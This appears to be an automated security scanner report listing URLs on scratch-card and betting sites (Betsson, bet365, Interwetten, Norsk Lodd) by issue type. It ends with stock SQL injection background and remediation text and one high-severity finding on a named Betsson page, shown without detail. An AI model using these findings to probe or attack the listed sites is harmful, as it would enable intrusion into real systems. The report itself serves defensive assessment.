18.25. http://www.facebook.com/plugins/likebox.php

18.26. http://www.facebook.com/plugins/likebox.php

18.27. http://www.incomate.com/

18.28. http://www.info.crazyscratch.com/AboutUs.aspx

18.29. http://www.info.crazyscratch.com/ContactUsMail.aspx

18.30. http://www.info.crazyscratch.com/FairPlay.aspx

18.31. http://www.info.crazyscratch.com/Help.aspx

18.32. http://www.info.crazyscratch.com/InviteFriend.aspx

18.33. http://www.info.crazyscratch.com/PlayersClub.aspx

18.34. http://www.info.crazyscratch.com/Privacy.aspx

18.35. http://www.info.crazyscratch.com/Promotions.aspx

18.36. http://www.info.crazyscratch.com/Responsible.aspx

18.37. http://www.info.crazyscratch.com/Terms.aspx

18.38. http://www.info.crazyscratch.com/UnderAge.aspx

18.39. https://www.interwetten.com/en/default.aspx

18.40. http://www.karamba.com/Home.aspx

18.41. http://www.lga.org.mt/lga/content.aspx

18.42. https://www.neogamespartners.com/

18.43. http://www.okscratchcards.com/

18.44. http://www.okscratchcards.com/terms-and-conditions.aspx

18.45. http://www.primescratchcards.com/index.asp

18.46. http://www.scratch2cash.com/Home.aspx

18.47. http://www.scratchcardheaven.com/Home.aspx

18.48. http://www.trustlogo.com/ttb_searcher/trustlogo

18.49. http://www.vincite.net/

19. Cross-domain script include

19.1. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

19.2. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

19.3. https://bingo.betsson.com/en/

19.4. http://blog.postcodelottery.com/

19.5. http://br.bigmoneyscratch.com/Home.aspx

19.6. http://br.winnings.com/

19.7. http://casino.bet365.com/home/en/

19.8. https://casino.betsson.com/en/

19.9. http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US

19.10. http://d.tradex.openx.com/afr.php

19.11. http://da.bigmoneyscratch.com/Home.aspx

19.12. http://da.winnings.com/

19.13. http://de.bigmoneyscratch.com/Home.aspx

19.14. http://de.winnings.com/

19.15. http://el.winnings.com/

19.16. http://es.bigmoneyscratch.com/Home.aspx

19.17. http://es.winnings.com/

19.18. http://fi.bigmoneyscratch.com/Home.aspx

19.19. http://fi.winnings.com/

19.20. http://fr.bigmoneyscratch.com/Home.aspx

19.21. http://fr.winnings.com/

19.22. http://games.bet365.com/home/en/

19.23. https://games.betsson.com/en/

19.24. http://getclicky.com/66384109

19.25. http://it.bigmoneyscratch.com/Home.aspx

19.26. http://itunes.apple.com/us/app/pclottery/id399201446

19.27. http://jquery.com/

19.28. http://leandrovieira.com/projects/jquery/lightbox/

19.29. https://livecasino.betsson.com/en/

19.30. http://mad4milk.net/

19.31. http://nl.bigmoneyscratch.com/Home.aspx

19.32. http://nl.winnings.com/

19.33. http://no.bigmoneyscratch.com/Home.aspx

19.34. http://no.winnings.com/

19.35. http://okscratchcards.com/

19.36. http://poker.bet365.com/home/en/

19.37. https://poker.betsson.com/en/

19.38. http://pt.bigmoneyscratch.com/Home.aspx

19.39. http://pt.winnings.com/

19.40. http://ronaldheft.com/code/analyticator/

19.41. https://scratch.betsson.com/en/

19.42. https://scratch.betsson.com/en/Casino

19.43. https://scratch.betsson.com/en/Casino/Bingo-Bonanza

19.44. https://scratch.betsson.com/en/Casino/Bubble-Bingo

19.45. https://scratch.betsson.com/en/Casino/Disco-Keno

19.46. https://scratch.betsson.com/en/Casino/HiLo

19.47. https://scratch.betsson.com/en/Casino/Lucky-21

19.48. https://scratch.betsson.com/en/Casino/Namaste

19.49. https://scratch.betsson.com/en/Casino/Poker-King

19.50. https://scratch.betsson.com/en/Casino/Roulette

19.51. https://scratch.betsson.com/en/Casino/Royal-Slots

19.52. https://scratch.betsson.com/en/Casino/Slot-Super-7

19.53. https://scratch.betsson.com/en/Classic

19.54. https://scratch.betsson.com/en/Classic/3-Wow

19.55. https://scratch.betsson.com/en/Classic/7th-Heaven

19.56. https://scratch.betsson.com/en/Classic/Champagne

19.57. https://scratch.betsson.com/en/Classic/Golden-Fortune

19.58. https://scratch.betsson.com/en/Classic/Happy-Birthday

19.59. https://scratch.betsson.com/en/Classic/Jungle-Joy

19.60. https://scratch.betsson.com/en/Classic/Neighbors

19.61. https://scratch.betsson.com/en/Classic/Spy-Comics

19.62. https://scratch.betsson.com/en/Classic/Super-3-Wow

19.63. https://scratch.betsson.com/en/Classic/Tiger-Mahjong

19.64. https://scratch.betsson.com/en/Classic/Wild-West

19.65. https://scratch.betsson.com/en/Classic/XO

19.66. https://scratch.betsson.com/en/Default.aspx

19.67. https://scratch.betsson.com/en/FAQ

19.68. https://scratch.betsson.com/en/Fantasy

19.69. https://scratch.betsson.com/en/Fantasy/Cash-Farm

19.70. https://scratch.betsson.com/en/Fantasy/Club-Pearl

19.71. https://scratch.betsson.com/en/Fantasy/Crazy-Cat

19.72. https://scratch.betsson.com/en/Fantasy/Dancing-Domino

19.73. https://scratch.betsson.com/en/Fantasy/Fast-Hands

19.74. https://scratch.betsson.com/en/Fantasy/Golden-Island

19.75. https://scratch.betsson.com/en/Fantasy/Knights-Battle

19.76. https://scratch.betsson.com/en/Fantasy/Love-Birds

19.77. https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds

19.78. https://scratch.betsson.com/en/Fantasy/Master-Mix

19.79. https://scratch.betsson.com/en/Fantasy/Memory-Madness

19.80. https://scratch.betsson.com/en/Fantasy/Ocean-Pearl

19.81. https://scratch.betsson.com/en/Fantasy/Outer-Space

19.82. https://scratch.betsson.com/en/Fantasy/Super-Chance

19.83. https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale

19.84. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya

19.85. https://scratch.betsson.com/en/Fantasy/Treasure-Island

19.86. https://scratch.betsson.com/en/Fantasy/Zodiac

19.87. https://scratch.betsson.com/en/GameHistory

19.88. https://scratch.betsson.com/en/Information

19.89. https://scratch.betsson.com/en/News

19.90. https://scratch.betsson.com/en/OurScratchcards

19.91. https://scratch.betsson.com/en/Ourwinners

19.92. https://scratch.betsson.com/en/Slots/5th-Avenue

19.93. https://scratch.betsson.com/en/Slots/Adventure-Jack

19.94. https://scratch.betsson.com/en/Slots/Atlantis

19.95. https://scratch.betsson.com/en/Slots/Bon-Apetit

19.96. https://scratch.betsson.com/en/Slots/Cafe-Paris

19.97. https://scratch.betsson.com/en/Slots/Castle-Slots

19.98. https://scratch.betsson.com/en/Slots/Chic-Boutique

19.99. https://scratch.betsson.com/en/Slots/Conga-Beat

19.100. https://scratch.betsson.com/en/Slots/Egyptian-Magic

19.101. https://scratch.betsson.com/en/Slots/Esmeralda

19.102. https://scratch.betsson.com/en/Slots/Fair-Play

19.103. https://scratch.betsson.com/en/Slots/Fantasia

19.104. https://scratch.betsson.com/en/Slots/Grand-Crown

19.105. https://scratch.betsson.com/en/Slots/Holiday-Hotel

19.106. https://scratch.betsson.com/en/Slots/Ice-Land

19.107. https://scratch.betsson.com/en/Slots/Legend-Of-Terra

19.108. https://scratch.betsson.com/en/Slots/Monaco-Glamour

19.109. https://scratch.betsson.com/en/Slots/Monte-Carlo

19.110. https://scratch.betsson.com/en/Slots/Pirates-Paradise

19.111. https://scratch.betsson.com/en/Slots/Sakura-Garden

19.112. https://scratch.betsson.com/en/Slots/Sea-And-Sun

19.113. https://scratch.betsson.com/en/Slots/Sky-Of-Love

19.114. https://scratch.betsson.com/en/Slots/Triple-Carnival

19.115. https://scratch.betsson.com/en/Slots/Tropical-Fruit

19.116. https://scratch.betsson.com/en/Sports/100m-Champion

19.117. https://scratch.betsson.com/en/Sports/Bowling

19.118. https://scratch.betsson.com/en/Sports/Darts

19.119. https://scratch.betsson.com/en/Sports/Goal-Kick

19.120. https://scratch.betsson.com/en/Sports/Gone-Fishing

19.121. https://scratch.betsson.com/en/Sports/Hippodrome

19.122. https://scratch.betsson.com/en/Sports/Ready-Set-Go

19.123. https://scratch.betsson.com/en/Sports/Road-Racing

19.124. https://scratch.betsson.com/en/Sports/World-Champions

19.125. http://sv.bigmoneyscratch.com/Home.aspx

19.126. http://sv.winnings.com/

19.127. http://twitter.com/PostcodeLottery

19.128. http://twitter.com/PrimeScratch

19.129. http://twitter.com/crazyscratch

19.130. http://twitter.com/ukscratch

19.131. http://www.affiliatelounge.com/

19.132. https://www.aspireaffiliates.com/

19.133. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

19.134. https://www.aspireaffiliates.com/marketing-samples/

19.135. https://www.aspireaffiliates.com/mobile/

19.136. https://www.betsson.com/start/en/

19.137. https://www.betsson.com/start/is/

19.138. https://www.betsson.com/web/en/sportsbook/

19.139. http://www.bigmoneyscratch.com/

19.140. http://www.facebook.com/

19.141. http://www.facebook.com/PrimeScratchCards

19.142. http://www.facebook.com/PrimeScratchCards

19.143. http://www.facebook.com/WinningsCom

19.144. http://www.facebook.com/crazyscratch

19.145. http://www.facebook.com/peoplespostcodelottery

19.146. http://www.facebook.com/plugins/likebox.php

19.147. http://www.gx4.com/

19.148. http://www.heavenaffiliates.com/

19.149. http://www.huddletogether.com/projects/lightbox2/

19.150. http://www.incomate.com/

19.151. http://www.metacafe.com/fplayer/

19.152. https://www.neogamespartners.com/

19.153. https://www.norskelodd.com/no/

19.154. https://www.norskelodd.com/no/FAQ

19.155. https://www.norskelodd.com/no/aboutus/

19.156. https://www.norskelodd.com/no/charity/

19.157. https://www.norskelodd.com/no/default.aspx

19.158. https://www.norskelodd.com/no/fair-play/

19.159. https://www.norskelodd.com/no/forgotten-password

19.160. https://www.norskelodd.com/no/play/3Wow

19.161. https://www.norskelodd.com/no/play/7thHeaven

19.162. https://www.norskelodd.com/no/play/GonzosQuest

19.163. https://www.norskelodd.com/no/promotions/

19.164. http://www.ok.co.uk/home/

19.165. http://www.okscratchcards.com/

19.166. http://www.opensource.org/licenses/mit-license.php

19.167. http://www.primegrattage.com/

19.168. http://www.vincite.net/

19.169. http://www.winnings.com/

19.170. http://www.winnings.com/how-to-win-money

19.171. http://www.winnings.com/instant-games

19.172. http://www.winnings.com/lottery-scratch-cards

19.173. http://www.winnings.com/scratch-cards

19.174. http://www.winnings.com/site-map

19.175. http://www.winnings.com/slots

19.176. http://www.youtube.com/user/CrazyScratchCom

19.177. http://www.youtube.com/user/PostcodeLottery

19.178. http://www.youtube.com/user/primescratchcards1

20. TRACE method is enabled

20.1. http://d.tradex.openx.com/

20.2. http://d.xp1.ru4.com/

20.3. http://gmpg.org/

20.4. http://jquery.com/

20.5. http://jquery.org/

20.6. http://m.xp1.ru4.com/

20.7. http://optimized-by.rubiconproject.com/

20.8. https://sealinfo.verisign.com/

20.9. http://secure-us.imrworldwide.com/

20.10. http://sizzlejs.com/

20.11. http://winter.metacafe.com/

20.12. http://www.egba.eu/

20.13. http://www.gambleaware.co.uk/

20.14. http://www.gamcare.org.uk/

20.15. http://www.gx4.com/

20.16. http://www.nedstat.com/

20.17. http://www.opensource.org/

20.18. http://www.postcodelottery.com/

20.19. https://www.postcodelottery.com/

20.20. http://www.quirksmode.org/

20.21. http://www.tstglobal.com/

21. Email addresses disclosed

21.1. https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js

21.2. https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js

21.3. https://members.bet365.com/members/chat/

21.4. http://neogames-tech.com/careers

21.5. http://neogames-tech.com/contact-us

21.6. http://neogames-tech.com/corporate

21.7. http://primescratchcards.com/images/HelpDepositMethods.asp

21.8. http://primescratchcards.com/images/InviteFriend.asp

21.9. http://primescratchcards.com/images/Responsible.asp

21.10. http://primescratchcards.com/images/SecurityAndPrivacy.asp

21.11. http://primescratchcards.com/images/aboutus.asp

21.12. http://primescratchcards.com/images/affiliates.asp

21.13. http://primescratchcards.com/images/bg.jpg

21.14. http://primescratchcards.com/images/contactus.asp

21.15. http://primescratchcards.com/images/fairplay.asp

21.16. http://primescratchcards.com/images/help.asp

21.17. http://primescratchcards.com/images/index.asp

21.18. http://primescratchcards.com/images/media.asp

21.19. http://primescratchcards.com/images/playersclub.asp

21.20. http://primescratchcards.com/images/promotions.asp

21.21. http://primescratchcards.com/images/terms.asp

21.22. http://primescratchcards.com/images/underage.asp

21.23. http://scratch.co.uk/about/

21.24. http://scratch.co.uk/contact/

21.25. http://scratch.co.uk/help/

21.26. http://scratch.co.uk/help/privacy/

21.27. http://scratch.co.uk/problem-gambling/

21.28. http://scratch.co.uk/vis-club/

21.29. http://trk.primescratchcards.com/w3c/p3p.xml

21.30. http://widgets.twimg.com/j/2/widget.css

21.31. http://widgets.twimg.com/j/2/widget.js

21.32. http://www.bet365.com/home/js/FlashDetection_vA009cr.js

21.33. http://www.bet365.com/home/js/Navigation_vA081cr.js

21.34. https://www.betsson.com/en/customer-service/

21.35. https://www.betsson.com/en/customer-service/responsible-gaming/

21.36. https://www.betsson.com/en/customer-service/terms/index.asp

21.37. http://www.bigmoneyscratch.com/Affiliates.aspx

21.38. http://www.gamblersanonymous.org/

21.39. http://www.gx4.com/

21.40. http://www.huddletogether.com/projects/lightbox2/

21.41. http://www.lga.org.mt/lga/content.aspx

21.42. http://www.lga.org.mt/lga/home.aspx

21.43. http://www.neogames.com/careers

21.44. http://www.neogames.com/contact-us

21.45. http://www.neogames.com/corporate

21.46. http://www.neogames.com/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group

21.47. https://www.norskelodd.com/no/FAQ

21.48. https://www.norskelodd.com/no/charity/

21.49. http://www.opensource.org/licenses/mit-license.php

21.50. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm

21.51. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm

21.52. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

21.53. http://www.primegrattage.com/

21.54. http://www.primescratchcards.com/

21.55. http://www.primescratchcards.com/HelpDepositMethods.asp

21.56. http://www.primescratchcards.com/InviteFriend.asp

21.57. http://www.primescratchcards.com/Responsible.asp

21.58. http://www.primescratchcards.com/SecurityAndPrivacy.asp

21.59. http://www.primescratchcards.com/aboutus.asp

21.60. http://www.primescratchcards.com/affiliates.asp

21.61. http://www.primescratchcards.com/contactus.asp

21.62. http://www.primescratchcards.com/fairplay.asp

21.63. http://www.primescratchcards.com/help.asp

21.64. http://www.primescratchcards.com/index.asp

21.65. http://www.primescratchcards.com/media.asp

21.66. http://www.primescratchcards.com/playersclub.asp

21.67. http://www.primescratchcards.com/promotions.asp

21.68. http://www.primescratchcards.com/terms.asp

21.69. http://www.primescratchcards.com/underage.asp

21.70. http://www.primescratchcards.com.br/

21.71. http://www.svenskalotter.com/Affiliates.aspx

21.72. http://www.svenskalotter.com/Charity.aspx

21.73. http://www.verisign.co.uk/

22. Private IP addresses disclosed

22.1. http://connect.facebook.net/en_US/all.js

22.2. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.3. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.4. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.5. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.6. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.7. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.8. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.9. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/R9NKeEUZ860.css

22.10. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/29zADtiP5cm.css

22.11. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/6Lsyu5J6BKV.css

22.12. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/13eVoEevxOb.css

22.13. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/KI-TuOEwsYB.js

22.14. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Gny22VYkiF8.css

22.15. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/qCyv4dtIhXX.css

22.16. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/cw0X-OuHro4.css

22.17. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/pnnjl6ACZdc.css

22.18. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/zu6qmwS44NI.css

22.19. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/JpK09bsayNa.js

22.20. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vGrfOJHPJkR.css

22.21. http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/dDcIjg2q0Sp.css

22.22. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ApyVrGzMbqQ.js

22.23. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/L-db0ALpEr8.js

22.24. http://static.ak.fbcdn.net/rsrc.php/v1/z5/r/55ZG1uMFCrx.png

22.25. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

22.26. http://static.ak.fbcdn.net/rsrc.php/v1/zC/r/5b5JL166gaA.png

22.27. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png

22.28. http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/3CROxDf49ph.png

22.29. http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png

22.30. http://www.facebook.com/

22.31. http://www.facebook.com/

22.32. http://www.facebook.com/PrimeScratchCards

22.33. http://www.facebook.com/PrimeScratchCards

22.34. http://www.facebook.com/WinningsCom

22.35. http://www.facebook.com/WinningsCom

22.36. http://www.facebook.com/crazyscratch

22.37. http://www.facebook.com/extern/login_status.php

22.38. http://www.facebook.com/extern/login_status.php

22.39. http://www.facebook.com/pages/BigMoneyScratch/156518521055171

22.40. http://www.facebook.com/pages/PrimeScratchCards/122783514413813

22.41. http://www.facebook.com/peoplespostcodelottery

22.42. http://www.facebook.com/plugins/likebox.php

22.43. http://www.facebook.com/plugins/likebox.php

22.44. https://www.interwetten.com/cs/Default.aspx

22.45. https://www.interwetten.com/de/Default.aspx

22.46. https://www.interwetten.com/el/Default.aspx

22.47. https://www.interwetten.com/en/Default.aspx

22.48. https://www.interwetten.com/en/casino/default.aspx

22.49. https://www.interwetten.com/en/games/default.aspx

22.50. https://www.interwetten.com/en/online-skillgames

22.51. https://www.interwetten.com/en/scratch/default.aspx

22.52. https://www.interwetten.com/en/skill/default.aspx

22.53. https://www.interwetten.com/es/Default.aspx

22.54. https://www.interwetten.com/fr/Default.aspx

22.55. https://www.interwetten.com/it/Default.aspx

22.56. https://www.interwetten.com/pt/Default.aspx

22.57. https://www.interwetten.com/tr/Default.aspx

22.58. http://www.metacafe.com/fplayer/

23. Robots.txt file

23.1. http://ad-emea.doubleclick.net/ad/N5493.Ok/B4240999.6

23.2. http://ad.doubleclick.net/N6707/adj/meta.homepage/adminMsg

23.3. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

23.4. http://b.scorecardresearch.com/b

23.5. https://bingo.betsson.com/en/

23.6. http://blog.crazyscratch.com/

23.7. http://blog.deconcept.com/swfobject/

23.8. http://blog.postcodelottery.com/

23.9. http://blog.primescratchcards.co.uk/

23.10. http://br.winnings.com/

23.11. http://c.betrad.com/a/n/581/1296.js

23.12. http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US

23.13. http://d.tradex.openx.com/afr.php

23.14. http://d.xp1.ru4.com/um

23.15. http://da.crazyscratch.com/

23.16. http://da.winnings.com/

23.17. http://de.crazyscratch.com/

23.18. http://de.winnings.com/

23.19. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

23.20. https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

23.21. http://download.neogames-tech.com/Brands/MundiRasca/Website/General/BottomMenuBG.jpg

23.22. https://download.neogames-tech.com/chat/chatstart.aspx

23.23. http://el.crazyscratch.com/

23.24. http://el.winnings.com/

23.25. http://en.crazyscratch.com/

23.26. http://es.crazyscratch.com/

23.27. http://es.winnings.com/

23.28. http://feeds.bbci.co.uk/news/rss.xml

23.29. http://fi.crazyscratch.com/

23.30. http://fi.winnings.com/

23.31. http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

23.32. http://fr.crazyscratch.com/

23.33. http://fr.winnings.com/

23.34. http://getclicky.com/66384109

23.35. http://gmpg.org/xfn/11

23.36. http://go.microsoft.com/fwlink/

23.37. http://it.crazyscratch.com/

23.38. http://itunes.apple.com/us/app/pclottery/id399201446

23.39. http://jquery.org/license

23.40. http://leandrovieira.com/projects/jquery/lightbox/

23.41. http://m.xp1.ru4.com/ad

23.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

23.43. http://nl.crazyscratch.com/

23.44. http://nl.winnings.com/

23.45. http://no.crazyscratch.com/

23.46. http://no.winnings.com/

23.47. http://pagead2.googlesyndication.com/pagead/imgad

23.48. http://pixel.invitemedia.com/data_sync

23.49. http://pixel.quantserve.com/pixel

23.50. http://pt.crazyscratch.com/

23.51. http://pt.winnings.com/

23.52. http://pubads.g.doubleclick.net/pagead/adview

23.53. http://s.mcstatic.com/Images/Studios/videogame/ChannelLogo.jpg

23.54. http://s0.2mdn.net/879366/flashwrite_1_2.js

23.55. http://s1.mcstatic.com/JS12/Home/

23.56. http://s3.mcstatic.com/thumb/6373642/18140891/4/videos/2/1/the_cleveland_show_karate_season_2.jpg

23.57. http://s4.mcstatic.com/CSS/Global/

23.58. http://s6.mcstatic.com/thumb/6289097/17948388/4/videos/0/1/l_a_noire_gameplay_series_3.jpg

23.59. http://safebrowsing.clients.google.com/safebrowsing/downloads

23.60. http://scratch.co.uk/

23.61. http://spe.atdmt.com/ds/AAAVEWEWAWWA/20110413_WWA_Sp11_X1_NewCreative/WWA_Sp11_X1_Online_Fingertips_300x250.gif

23.62. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.63. http://sv.crazyscratch.com/

23.64. http://sv.winnings.com/

23.65. http://twitter.com/ukscratch

23.66. http://va.px.invitemedia.com/goog_imp

23.67. http://video.google.com/googleplayer.swf

23.68. http://winnings.com/wp-content/plugins/google-analyticator/external-tracking.min.js

23.69. http://winter.metacafe.com/Openx/www/delivery/lg.php

23.70. http://www.adobe.com/go/getflashplayer

23.71. http://www.apple.com/qtactivex/qtplugin.cab

23.72. https://www.aspireaffiliates.com/

23.73. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

23.74. http://www.clickandbuy.com/WW_en/payment/index.html

23.75. http://www.crazyscratch.com/

23.76. http://www.facebook.com/WinningsCom

23.77. http://www.gambleaware.co.uk/

23.78. http://www.gamblersanonymous.org.uk/

23.79. http://www.gamcare.org.uk/

23.80. http://www.google-analytics.com/__utm.gif

23.81. http://www.heavenaffiliates.com/

23.82. https://www.interwetten.com/

23.83. http://www.itechlabs.com.au/

23.84. http://www.lga.org.mt/lga/content.aspx

23.85. http://www.metacafe.com/fplayer/

23.86. http://www.national-lottery.co.uk/

23.87. http://www.nedstat.com/terms.html

23.88. https://www.neogamespartners.com/

23.89. http://www.opensource.org/licenses/mit-license.php

23.90. http://www.paysafecard.com/

23.91. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

23.92. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

23.93. http://www.thawte.com/

23.94. https://www.thawte.com/

23.95. http://www.trustlogo.com/ttb_searcher/trustlogo

23.96. http://www.tstglobal.com/

23.97. http://www.ukash.com/

23.98. http://www.verisign.co.uk/

23.99. http://www.vincite.net/

23.100. http://www.winnings.com/

23.101. http://www.youtube.com/v/

24. Cacheable HTTPS response

24.1. https://in.getclicky.com/

24.2. https://sealinfo.verisign.com/splash

24.3. https://www.aspireaffiliates.com/

24.4. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

24.5. https://www.aspireaffiliates.com/marketing-samples/

24.6. https://www.aspireaffiliates.com/mobile/

24.7. https://www.betsson.com/en/customer-service/

24.8. https://www.betsson.com/en/customer-service/forgotten-password/

24.9. https://www.betsson.com/en/customer-service/privacy-statement/

24.10. https://www.betsson.com/en/customer-service/responsible-gaming/

24.11. https://www.betsson.com/en/customer-service/terms/index.asp

24.12. https://www.betsson.com/my-account/refer-a-friend/index.asp

24.13. https://www.interwetten.com/en/Default.aspx

24.14. https://www.interwetten.com/en/american-football-betting

24.15. https://www.interwetten.com/en/australian-rules-football-betting

24.16. https://www.interwetten.com/en/beach-soccer-betting

24.17. https://www.interwetten.com/en/boxing-betting

24.18. https://www.interwetten.com/en/casino/default.aspx

24.19. https://www.interwetten.com/en/cycling-betting

24.20. https://www.interwetten.com/en/darts-betting

24.21. https://www.interwetten.com/en/football-betting

24.22. https://www.interwetten.com/en/games/default.aspx

24.23. https://www.interwetten.com/en/golf-betting

24.24. https://www.interwetten.com/en/handball-betting

24.25. https://www.interwetten.com/en/ice-hockey-betting

24.26. https://www.interwetten.com/en/livebets

24.27. https://www.interwetten.com/en/motorbikes-betting

24.28. https://www.interwetten.com/en/online-skillgames

24.29. https://www.interwetten.com/en/politics-betting

24.30. https://www.interwetten.com/en/rugby-betting

24.31. https://www.interwetten.com/en/sailing-betting

24.32. https://www.interwetten.com/en/scratch/default.aspx

24.33. https://www.interwetten.com/en/ski-alpine-betting

24.34. https://www.interwetten.com/en/skill/default.aspx

24.35. https://www.interwetten.com/en/sportsbook/default.aspx

24.36. https://www.interwetten.com/en/tennis-betting

24.37. https://www.interwetten.com/en/volleyball-betting

24.38. https://www.interwetten.com/en/water-polo-betting

24.39. https://www.interwetten.com/en/winter-games-betting

24.40. https://www.norskelodd.com/no/

24.41. https://www.norskelodd.com/no/FAQ

24.42. https://www.norskelodd.com/no/aboutus/

24.43. https://www.norskelodd.com/no/charity/

24.44. https://www.norskelodd.com/no/default.aspx

24.45. https://www.norskelodd.com/no/fair-play/

24.46. https://www.norskelodd.com/no/forgotten-password

24.47. https://www.norskelodd.com/no/play/3Wow

24.48. https://www.norskelodd.com/no/play/7thHeaven

24.49. https://www.norskelodd.com/no/play/GonzosQuest

24.50. https://www.norskelodd.com/no/promotions/

24.51. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

24.52. https://www.thawte.com/

25. HTML does not specify charset

25.1. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

25.2. http://d.xp1.ru4.com/um

25.3. http://download.neogames-tech.com/

25.4. http://f.nexac.com/favicon.ico

25.5. http://in.getclicky.com/

25.6. https://in.getclicky.com/

25.7. http://members.bet365.com/site.asp

25.8. http://neogames-tech.com/outbound/article/www.lga.org.mt

25.9. http://pixel.invitemedia.com/data_sync

25.10. http://trk.primescratchcards.com/

25.11. http://www.gamblersanonymous.org/

25.12. http://www.maestrocard.com/

25.13. http://www.mastercard.com/uk/gateway.html

25.14. http://www.neogames.com/outbound/article/crazyscratch.com

25.15. http://www.neogames.com/outbound/article/karamba.com

25.16. http://www.neogames.com/outbound/article/mundirasca.com

25.17. http://www.neogames.com/outbound/article/norgesloddet.com

25.18. http://www.neogames.com/outbound/article/scratch.betsson.com

25.19. http://www.neogames.com/outbound/article/www.crazyscratch.com

25.20. http://www.neogames.com/outbound/article/www.interwetten.com

25.21. http://www.neogames.com/outbound/article/www.postcodelottery.co.uk

25.22. http://www.neogames.com/outbound/article/www.winnings.com

25.23. http://www.primescratchcards.com/track/

25.24. http://www.verisign.co.uk/

25.25. http://www.winnings.com/wp-admin/admin-ajax.php

26. Content type incorrectly stated

26.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

26.2. http://in.getclicky.com/

26.3. https://in.getclicky.com/

26.4. http://neogames-tech.com/outbound/article/www.lga.org.mt

26.5. http://rtb50.doubleverify.com/rtb.ashx/verifyc

26.6. https://secure.neogames-tech.com/ScratchCards/images/seal_background.png

26.7. http://server.iad.liveperson.net/hcp/html/mTag.js

26.8. http://trk.primescratchcards.com/w3c/p3p.xml

26.9. http://www.neogames.com/outbound/article/crazyscratch.com

26.10. http://www.neogames.com/outbound/article/karamba.com

26.11. http://www.neogames.com/outbound/article/mundirasca.com

26.12. http://www.neogames.com/outbound/article/norgesloddet.com

26.13. http://www.neogames.com/outbound/article/scratch.betsson.com

26.14. http://www.neogames.com/outbound/article/www.crazyscratch.com

26.15. http://www.neogames.com/outbound/article/www.interwetten.com

26.16. http://www.neogames.com/outbound/article/www.postcodelottery.co.uk

26.17. http://www.neogames.com/outbound/article/www.winnings.com

26.18. http://www.winnings.com/wp-admin/admin-ajax.php

27. Content type is not specified



1. SQL injection  next
There are 13 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. https://scratch.betsson.com/en/Casino/Disco-Keno [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Casino/Disco-Keno

Issue detail

